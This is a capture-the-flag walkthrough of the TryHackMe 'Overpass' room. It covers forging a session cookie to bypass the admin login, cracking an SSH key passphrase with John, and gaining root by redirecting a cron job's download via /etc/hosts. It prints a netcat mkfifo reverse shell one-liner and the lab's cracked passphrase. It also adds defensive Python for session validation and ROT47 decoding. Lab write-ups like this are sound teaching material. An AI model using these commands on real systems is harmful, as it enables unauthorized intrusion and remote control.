# Overpass

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbJJvJdiThVEegFoNh2%2F-MbJKEnssg3OjSU-8jum%2Fimage.png?alt=media\&token=ebb6e6cb-3fd3-46f5-92af-c2b32804affc)

## Reconnaissance

An initial nmap scan to find open ports, using **-Pn** (treat all hosts as alive, i.e. skip host discovery) in case the box does not answer ping:

```
nmap -Pn 10.10.48.148
```

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbJKFzxr6IZSyHBZm4L%2F-MbJL-uIovZr6Co0Hjam%2Fimage.png?alt=media\&token=d70500ff-d17d-4d89-92f4-4a677cb98dcb)

Detailed Nmap scan of the interesting ports:

Command breakdown:

* **-sV**: service version detection
* **-sC**: run the default nmap scripts
* **-p**: the ports to scan
* **-oN nmap**: save the output to a file called `nmap`

```
nmap -sV -sC -p 21,22,80 -oN nmap 10.10.48.148
```

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbJKFzxr6IZSyHBZm4L%2F-MbJL4lQjtVPgy9MxZpc%2Fimage.png?alt=media\&token=020a3cb0-3837-4a85-bde9-d1f817591530)

## Enumeration

Let's visit the website.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbJKFzxr6IZSyHBZm4L%2F-MbJLGYKPWDDr09bRt-z%2Fimage.png?alt=media\&token=f7e407ad-18a3-46e3-b90e-e6e6c6984c78)

Nothing of interest on the front page, so let's run `gobuster` to find hidden directories:

```bash
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.48.148/
```

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbJLTSDgka83TU_H-7I%2F-MbJM-vDXiHBXe3TiTp0%2Fimage.png?alt=media\&token=1646abb9-0e6e-4014-811c-02af19bedffe)

We find an `admin` page, so let's visit it.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbJLTSDgka83TU_H-7I%2F-MbJMRAzolM_FCSzivkY%2Fimage.png?alt=media\&token=a159e2b8-7f6e-4c7d-926a-f56591b19854)

It's a login page. Looking through the page's source files, the interesting one is `login.js`, and specifically its `login` function:

```javascript
// login() from the admin page's login.js (closing brace restored; it was cut off)
async function login() {
    const usernameBox = document.querySelector("#username");
    const passwordBox = document.querySelector("#password");
    const loginStatus = document.querySelector("#loginStatus");
    loginStatus.textContent = ""
    const creds = { username: usernameBox.value, password: passwordBox.value }
    // postData() is defined elsewhere in login.js (not shown)
    const response = await postData("/api/login", creds)
    const statusOrCookie = await response.text()
    if (statusOrCookie === "Incorrect credentials") {
        loginStatus.textContent = "Incorrect Credentials"
        passwordBox.value=""
    } else {
        // anything other than the failure string is stored as the session cookie, client-side
        Cookies.set("SessionToken",statusOrCookie)
        window.location = "/admin"
    }
}
```

Look at the `if` statement: if we log in with wrong credentials the server responds with the string `Incorrect credentials`; for any other response the script takes the body as-is, stores it in a `SessionToken` cookie and redirects to `/admin`. The cookie is set entirely client-side, so nothing stops us from setting it ourselves.

So open the browser console (`Ctrl + Shift + I`) on the page and set the `SessionToken` cookie by hand, using the same `Cookies.set` call the login function uses. The value does not have to be a real token:

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbJLTSDgka83TU_H-7I%2F-MbJQLEDN7SjA5w19kgc%2Fimage.png?alt=media\&token=fb8503a1-e93b-4d18-b76b-67d6c2c555d8)

Press Enter and reload the page: you are logged in. The `/admin` handler evidently checks only that a `SessionToken` cookie is present, not that its value is a session the server ever issued.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbJLTSDgka83TU_H-7I%2F-MbJQSUG77SXNe6-Qr5q%2Fimage.png?alt=media\&token=20bd28ed-295c-475d-a16a-020e83cf048f)
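The weakness is not in `login.js` itself but in what the server accepts. The following Python is an added example, not code from the room or its author: it puts a presence-only check like the one `/admin` evidently performs next to a server-side session store that issues random tokens, keeps only their hashes and expires them. The function names, the cookie strings and the session lifetime are assumptions made for the illustration.

```python
# Added example, not the room's or its author's code: a presence-only cookie
# check like the one the /admin page evidently performs, next to a server-side
# session store.  Names, cookie strings and session lifetimes are assumptions.
import hashlib
import secrets
import time


def parse_cookie_header(header: str) -> dict:
    """Turn a raw 'Cookie:' request header into {name: value}."""
    cookies = {}
    for part in header.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep and name:
            cookies[name] = value
    return cookies


def vulnerable_is_authenticated(cookie_header: str) -> bool:
    """What the room's /admin page does in effect: any SessionToken value,
    including one typed into the browser console, counts as a login."""
    return "SessionToken" in parse_cookie_header(cookie_header)


class SessionStore:
    """Server-side sessions.  The browser holds a random token; the server
    keeps only its SHA-256, so a leaked session table yields no usable cookies."""

    def __init__(self):
        self._sessions = {}  # sha256(token) -> (username, expiry as epoch seconds)

    @staticmethod
    def _digest(token: str) -> str:
        return hashlib.sha256(token.encode()).hexdigest()

    def issue(self, username: str, ttl_seconds: int = 900, now=None) -> str:
        now = time.time() if now is None else now
        token = secrets.token_urlsafe(32)  # 256 bits from the OS CSPRNG: unguessable
        self._sessions[self._digest(token)] = (username, now + ttl_seconds)
        return token

    def lookup(self, token: str, now=None):
        """Username for a live session, or None for unknown or expired tokens."""
        now = time.time() if now is None else now
        key = self._digest(token)
        entry = self._sessions.get(key)
        if entry is None:
            return None
        username, expiry = entry
        if now >= expiry:
            del self._sessions[key]
            return None
        return username


def hardened_is_authenticated(cookie_header: str, store: SessionStore, now=None) -> bool:
    """Accept only a token this server issued and that has not expired."""
    token = parse_cookie_header(cookie_header).get("SessionToken")
    if not token:
        return False
    return store.lookup(token, now) is not None


def demo() -> dict:
    """Replay the console trick against both checks (constructed cookies)."""
    store = SessionStore()
    forged = "SessionToken=anything"  # what Cookies.set("SessionToken", ...) in the console amounts to
    real = "SessionToken=" + store.issue("admin", ttl_seconds=900, now=0)
    return {
        "forged_vs_vulnerable": vulnerable_is_authenticated(forged),
        "forged_vs_hardened": hardened_is_authenticated(forged, store, now=0),
        "real_vs_hardened": hardened_is_authenticated(real, store, now=0),
        "expired_vs_hardened": hardened_is_authenticated(real, store, now=901),
    }


if __name__ == "__main__":
    for check, result in demo().items():
        print(f"{check}: {result}")
```

Run it and the forged cookie passes the first check and fails the second. Storing only the hash means a dump of the session table gives an attacker nothing to paste into `Cookies.set`, and the expiry bounds how long a stolen cookie stays useful.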

The admin page shows an RSA private key. It is passphrase-protected, so the plan is: save the key to a file, crack the passphrase with John the Ripper, then use the key to log in over SSH. I copied the key into a file called `id_rsa`.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbJLTSDgka83TU_H-7I%2F-MbJQqcBHB0WJySeF81z%2Fimage.png?alt=media\&token=d2194ee3-3c8b-42dc-b02b-a06692b5a224)

SSH will not use the key without its passphrase, so we need to recover it. `ssh2john` does not crack anything itself; it converts the key into a hash format that John can attack (the path below is where Kali installs it; other installs put the script elsewhere):

```bash
/usr/share/john/ssh2john.py id_rsa > id_rsa_hash
```

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbJLTSDgka83TU_H-7I%2F-MbJR37lljU6KPwHPjb3%2Fimage.png?alt=media\&token=3c667fc9-2663-4dae-8a81-a83ebc2a4f81)

Now crack the hash with John the Ripper and the `rockyou.txt` wordlist:

```bash
john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa_hash
```

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbJLTSDgka83TU_H-7I%2F-MbJRMjVTDrk_gL0L94R%2Fimage.png?alt=media\&token=f1c0d927-e347-4496-9d5c-03f0ad596719)

John recovers the passphrase `james13` (if you need it again later, `john --show id_rsa_hash` prints it from John's pot file).

SSH refuses to use a private key that other users can read, so restrict the file's permissions first:

```bash
chmod 600 id_rsa
```

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbJLTSDgka83TU_H-7I%2F-MbJRec-jzZBskG-1Vsh%2Fimage.png?alt=media\&token=eee136f9-8eba-4df5-8b9d-7907dba4f7fc)

Now we can log in over SSH. The username is not given anywhere, but the passphrase `james13` contains the name james, so that is the obvious first guess:

```bash
ssh -i id_rsa james@10.10.48.148
```

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbJLTSDgka83TU_H-7I%2F-MbJRxu4F6G9eTqjhbHA%2Fimage.png?alt=media\&token=528b491a-67f8-4218-9719-4054dbd595d1)

We can now read the `user.txt`

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbJLTSDgka83TU_H-7I%2F-MbJS8New5d7wcq4YgaF%2Fimage.png?alt=media\&token=8365f1b8-e9ee-43bc-806c-1cd352365d07)

## Privilege Escalation

`sudo -l` would show what we can run as root, but it prompts for james's account password, which we don't have: `james13` is the SSH key's passphrase, not the login password.

In the home directory there is a file called `todo.txt`, so let's read it:

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbJLTSDgka83TU_H-7I%2F-MbJSpv07dZNDJ3FXZzG%2Fimage.png?alt=media\&token=44b2d4ff-143d-4f8a-bc3f-4e8f42d48ba4)

From this we learn:

* There is a password somewhere in the password manager they wrote
* The encryption that password manager uses is weak
* There is an automated build script running

There is also a hidden file in this directory called `.overpass`:

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbJTLLroVixTTLMJwDH%2F-MbJTeYBRdl24tglfHVi%2Fimage.png?alt=media\&token=1fbdf794-98a0-4fc0-b754-b5d97b09cbec)

Let's read it:

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbJTLLroVixTTLMJwDH%2F-MbJTs-hgJE1lbbg63vp%2Fimage.png?alt=media\&token=8b7cce07-f434-4d88-8c94-f77fef97ff82)

It looks like obfuscated text rather than real code, so let's paste it into [CyberChef](https://gchq.github.io/CyberChef/). After trying several recipes, `ROT47` turns out to be the right one:

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbJTLLroVixTTLMJwDH%2F-MbJUBejmQ01939bcsbt%2Fimage.png?alt=media\&token=a6ea06b6-a9cb-47d0-bb94-46e4be509b70)
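Rather than trying CyberChef recipes one at a time, the whole ROT family over printable ASCII can be brute-forced. The following Python is an added example, not the room's code: it implements ROT47 as the general rot-N over the 94 printable characters, tries every shift and ranks the results by a simple English letter-frequency score with a penalty for characters that rarely appear in text or config files. The sample plaintext is constructed for the example and is not the real contents of `.overpass`.

```python
# Added example, not the room's or its author's code: ROT47 written as the
# general rot-N over the 94 printable ASCII characters, plus a brute force over
# every shift that ranks the candidates by English letter frequency.  The sample
# plaintext below is constructed for the example, not the real .overpass content.

PRINTABLE_LO, PRINTABLE_N = 33, 94  # ROT47 rotates the characters '!' .. '~'

# approximate English letter frequencies in percent
LETTER_FREQ = {
    "a": 8.2, "b": 1.5, "c": 2.8, "d": 4.3, "e": 12.7, "f": 2.2, "g": 2.0,
    "h": 6.1, "i": 7.0, "j": 0.15, "k": 0.77, "l": 4.0, "m": 2.4, "n": 6.7,
    "o": 7.5, "p": 1.9, "q": 0.095, "r": 6.0, "s": 6.3, "t": 9.1, "u": 2.8,
    "v": 0.98, "w": 2.4, "x": 0.15, "y": 2.0, "z": 0.074,
}
# characters that are rare in prose, code and config files alike; a wrong shift
# scatters letters onto them, so each occurrence costs the candidate
RARE = set("`^~|\\<>")
RARE_PENALTY = 15.0


def rot_n(text: str, shift: int) -> str:
    """Rotate each printable ASCII character by `shift` positions; anything
    outside '!'..'~' (newlines, tabs, non-ASCII) passes through unchanged."""
    out = []
    for ch in text:
        code = ord(ch)
        if PRINTABLE_LO <= code < PRINTABLE_LO + PRINTABLE_N:
            code = (code - PRINTABLE_LO + shift) % PRINTABLE_N + PRINTABLE_LO
        out.append(chr(code))
    return "".join(out)


def rot47(text: str) -> str:
    """ROT47 is its own inverse: applying it twice rotates by 94, a full turn."""
    return rot_n(text, 47)


def text_score(text: str) -> float:
    """Higher is more English-like: letter frequencies minus a penalty per rare character."""
    score = 0.0
    for ch in text:
        score += LETTER_FREQ.get(ch.lower(), 0.0)
        if ch in RARE:
            score -= RARE_PENALTY
    return score


def rank_shifts(ciphertext: str) -> list:
    """Try every decoding shift; return (shift, score, candidate) tuples, best first."""
    candidates = []
    for n in range(PRINTABLE_N):
        candidate = rot_n(ciphertext, n)
        candidates.append((n, text_score(candidate), candidate))
    candidates.sort(key=lambda c: c[1], reverse=True)
    return candidates


# constructed sample in the shape todo.txt describes (a password-manager entry);
# the values are placeholders, not the room's real secret
SAMPLE_PLAINTEXT = '[{"name":"System","pass":"correct-horse-battery"}]'
SAMPLE_CIPHERTEXT = rot47(SAMPLE_PLAINTEXT)

if __name__ == "__main__":
    print("encoded :", SAMPLE_CIPHERTEXT)
    for shift, score, candidate in rank_shifts(SAMPLE_CIPHERTEXT)[:3]:
        print(f"shift {shift:2d}  score {score:6.1f}  {candidate}")
```

The frequency score is a heuristic for short inputs, which is why the rare-character penalty is there: with only a few dozen characters, a wrong shift that happens to land the most common symbol on `e` can otherwise come close to the real plaintext. For a file that is not English-like, look at the top few candidates rather than trusting only the first.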

I looked for a way to use the decoded password to escalate to root, but it did not get me anywhere, so we need another route.

Looking back at `todo.txt`, it mentioned an automated build script, so let's check the system crontab:

```bash
cat /etc/crontab
```

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbK-PE749HjgAs-xawb%2F-MbK2DTlh5E-vg92FWoO%2Fimage.png?alt=media\&token=be84a63c-01f7-411d-9f4b-5bd9b31d5f16)

The last line is the interesting one: each time it fires, the cron job fetches `buildscript.sh` from `overpass.thm` over HTTP and pipes it straight into `bash`, as root, with no integrity check. Whoever controls what `overpass.thm` resolves to therefore controls what root executes. Name resolution consults `/etc/hosts` before DNS, so if that file is writable by our user (check with `ls -l /etc/hosts`; on this box it is), we can point `overpass.thm` at our own TryHackMe VPN IP by replacing the IP on its line:

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbK-PE749HjgAs-xawb%2F-MbK2v5UyoQAyGB6AX-l%2Fimage.png?alt=media\&token=7c8db268-f490-4b2b-9a48-f0deea2166ec)

The cron job requests the path `/downloads/src/buildscript.sh`, so our web server has to serve the file at that same path. Create the matching directory structure on the attacking machine:

```bash
mkdir -p downloads/src
```

Now create a file called `buildscript.sh` containing a reverse shell. The cron job will fetch and execute whatever is in it the next time it fires, so the shell comes back to us on the job's schedule.

The one-liner below is from the pentestmonkey [reverse shell cheat sheet](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet); replace `10.13.8.64` with your own VPN IP:

```bash
echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.13.8.64 1234 >/tmp/f' > buildscript.sh
```

Now start a web server with Python so the victim can fetch the file. Run it from the directory that contains `downloads` (the parent of `downloads/src`), because the job's request path is resolved relative to the server's root. Also start a netcat listener for the reverse shell:

```bash
python3 -m http.server 80
```

```bash
nc -lvnp 1234
```

When the cron job next fires, the Python web server logs the GET request for `buildscript.sh`:

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbK47vdi30002z1bdPt%2F-MbK4zsksm_qLEB6sHxf%2Fimage.png?alt=media\&token=263d511e-0a9b-4c2b-acb6-f3310f5e710f)

And the netcat listener receives a shell running as root, because the cron job itself runs as root:

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbK47vdi30002z1bdPt%2F-MbK55hTpoCTD0PCz-lu%2Fimage.png?alt=media\&token=96644c1b-51b0-48cf-bbde-4198851f3c35)

Now you can read the `root.txt` file and answer the last question of this room

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbK47vdi30002z1bdPt%2F-MbK5GX-kgd-TuejScDa%2Fimage.png?alt=media\&token=ce08132d-33b7-4a74-a67b-3a39f39e324b)
